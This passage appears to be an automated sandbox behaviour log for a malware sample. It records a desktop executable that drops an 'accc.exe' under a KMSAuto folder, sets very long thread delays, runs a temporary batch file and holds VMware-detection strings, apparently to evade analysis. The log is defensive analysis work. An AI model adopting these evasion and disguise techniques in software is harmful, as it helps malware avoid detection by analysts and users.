            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeMemory allocated: 1430000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeMemory allocated: 31E0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeMemory allocated: 51E0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeMemory allocated: 14A0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeMemory allocated: 2FB0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeMemory allocated: 2DD0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeMemory allocated: 6210000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeMemory allocated: F210000 memory reserve | memory write watchJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeMemory allocated: A50000 memory reserve | memory write watchJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeMemory allocated: 2440000 memory reserve | memory write watchJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeMemory allocated: 4440000 memory reserve | memory write watchJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeMemory allocated: 5580000 memory reserve | memory write watchJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeMemory allocated: 4A20000 memory reserve | memory write watchJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeMemory allocated: 2800000 memory reserve | memory write watchJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeMemory allocated: 2990000 memory reserve | memory write watchJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeMemory allocated: 4990000 memory reserve | memory write watchJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeMemory allocated: 5A10000 memory reserve | memory write watchJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeMemory allocated: 4F00000 memory reserve | memory write watchJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeMemory allocated: 18D0000 memory reserve | memory write watchJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeMemory allocated: 33D0000 memory reserve | memory write watchJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeMemory allocated: 30F0000 memory reserve | memory write watchJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeMemory allocated: 19D0000 memory reserve | memory write watchJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeMemory allocated: 3220000 memory reserve | memory write watchJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeMemory allocated: 3040000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe TID: 7780Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe TID: 7352Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\timeout.exe TID: 6264Thread sleep count: 46 > 30Jump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exe TID: 4772Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\tmp5337.tmp.batJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
            Source: Amcache.hve.4.drBinary or memory string: VMware
            Source: Amcache.hve.4.drBinary or memory string: VMware Virtual USB Mouse
            Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin
            Source: Amcache.hve.4.drBinary or memory string: VMware, Inc.
            Source: Amcache.hve.4.drBinary or memory string: VMware20,1hbin@
